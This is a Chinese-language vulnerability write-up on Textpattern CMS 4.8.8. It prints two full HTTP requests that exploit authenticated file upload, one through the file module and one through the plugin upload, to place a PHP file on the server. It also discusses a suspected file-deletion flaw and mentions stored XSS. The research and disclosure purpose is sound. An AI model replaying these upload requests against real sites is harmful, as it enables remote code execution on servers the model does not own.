漏洞厂商: Textpattern CMS
影响产品: Textpattern CMS 4.8.8
漏洞描述: Textpattern CMS是一个优雅的内容管理系统,是免费的开源软件。网页设计师、开发人员、出版商和博主都喜欢它的灵活性和可扩展性。它有一个强大而复杂的引擎,可以无限调整以适应您可以想象的任何类型的网站。
授权任意文件上传
登录后台后重点关注文件上传相关操作
data:image/s3,"s3://crabby-images/a58e5/a58e547a8c19798b20d6d595d75db773e892811c" alt=""
本身就存在后台文件上传模块
上传文件的数据包
POST /textpattern/index.php?event=file HTTP/1.1
Host: textpattern.test
Content-Length: 947
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNmmAxAQGdHfkvmDE
Origin: http://textpattern.test
Referer: http://textpattern.test/textpattern/index.php?event=file
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: txp_login=admin%2C462fb94c23884fe5a776b18253052e93; txp_login_public=471f257603admin
Connection: close
------WebKitFormBoundaryNmmAxAQGdHfkvmDE
Content-Disposition: form-data; name="fileInputOrder"
1/1
------WebKitFormBoundaryNmmAxAQGdHfkvmDE
Content-Disposition: form-data; name="app_mode"
async
------WebKitFormBoundaryNmmAxAQGdHfkvmDE
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2000000
------WebKitFormBoundaryNmmAxAQGdHfkvmDE
Content-Disposition: form-data; name="event"
file
------WebKitFormBoundaryNmmAxAQGdHfkvmDE
Content-Disposition: form-data; name="step"
file_insert
------WebKitFormBoundaryNmmAxAQGdHfkvmDE
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryNmmAxAQGdHfkvmDE
Content-Disposition: form-data; name="_txp_token"
a99a6a8bbd326c90408c313a55141f79
------WebKitFormBoundaryNmmAxAQGdHfkvmDE
Content-Disposition: form-data; name="thefile[]"; filename="test.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
------WebKitFormBoundaryNmmAxAQGdHfkvmDE--
data:image/s3,"s3://crabby-images/7b546/7b546de4e027ab7390f7412762881ce4f35a1f77" alt=""
访问 files/test.php
data:image/s3,"s3://crabby-images/c48da/c48da266f9aadb3fef693374db9b9bd075f0f403" alt=""
textpattern/include/txp_file.php#file_insert
data:image/s3,"s3://crabby-images/d2e36/d2e36bccfaa692ec9c4e3e9930080c5b9d8f6f62" alt=""
授权任意文件上传二
data:image/s3,"s3://crabby-images/a9510/a95102fca9e0ca1c4e95548f5405d4da86784619" alt=""
POST /textpattern/index.php HTTP/1.1
Host: textpattern.test
Content-Length: 655
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://textpattern.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryP3IHAwJA1yJ6ulER
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://textpattern.test/textpattern/index.php?event=plugin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: txp_login=admin%2C462fb94c23884fe5a776b18253052e93; txp_login_public=471f257603admin
Connection: close
------WebKitFormBoundaryP3IHAwJA1yJ6ulER
Content-Disposition: form-data; name="theplugin"; filename="test.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
------WebKitFormBoundaryP3IHAwJA1yJ6ulER
Content-Disposition: form-data; name="install_new"
Upload
------WebKitFormBoundaryP3IHAwJA1yJ6ulER
Content-Disposition: form-data; name="event"
plugin
------WebKitFormBoundaryP3IHAwJA1yJ6ulER
Content-Disposition: form-data; name="step"
plugin_upload
------WebKitFormBoundaryP3IHAwJA1yJ6ulER
Content-Disposition: form-data; name="_txp_token"
a99a6a8bbd326c90408c313a55141f79
------WebKitFormBoundaryP3IHAwJA1yJ6ulER--
data:image/s3,"s3://crabby-images/b65fd/b65fd8c385e51fa257a0aa49f810c4d2760eb701" alt=""
textpattern/plugins/test/test.php
data:image/s3,"s3://crabby-images/95667/9566778966a3d2f5de748928348f68ee4456cb07" alt=""
textpattern/include/txp_plugin.php#plugin_upload
data:image/s3,"s3://crabby-images/9315f/9315f6959e37ec69e58a4fffba8cf65e939258a0" alt=""
存疑的任意文件删除
在查看代码的时候发现此处
data:image/s3,"s3://crabby-images/7e1bb/7e1bb62f1bb54ef8fbf84b65f49c696e3ea1d872" alt=""
$_FILES["theplugin"]["name"]
是 PHP 中用于获取上传文件的原始文件名的变量。它用于访问通过表单上传的文件的文件名。在这个例子中,theplugin
是表单中文件上传字段的名称。通过访问 $_FILES["theplugin"]["name"]
,您可以获取上传文件的原始文件名。
可以通过外界参数来控制最后删除文件的位置
data:image/s3,"s3://crabby-images/12121/1212115fae03d5edba658b53d9051b5cb5fc12f6" alt=""
构造数据包时却发现
data:image/s3,"s3://crabby-images/b84bd/b84bd512324a54afa283167568e032df6a65879d" alt=""
斜杠会被吃掉
data:image/s3,"s3://crabby-images/c1c22/c1c228307e9d3bc4eb887c598c1261fffb0be76c" alt=""
仅仅会处理斜杠和反斜杠,搜索了一圈没有发现处理这部分的代码,也没有想到比较好的处理方式,希望有师傅可以互相讨论一下。
存储型XSS *N
data:image/s3,"s3://crabby-images/68968/68968e8db9e20a247353e585c33e3b300973a13e" alt=""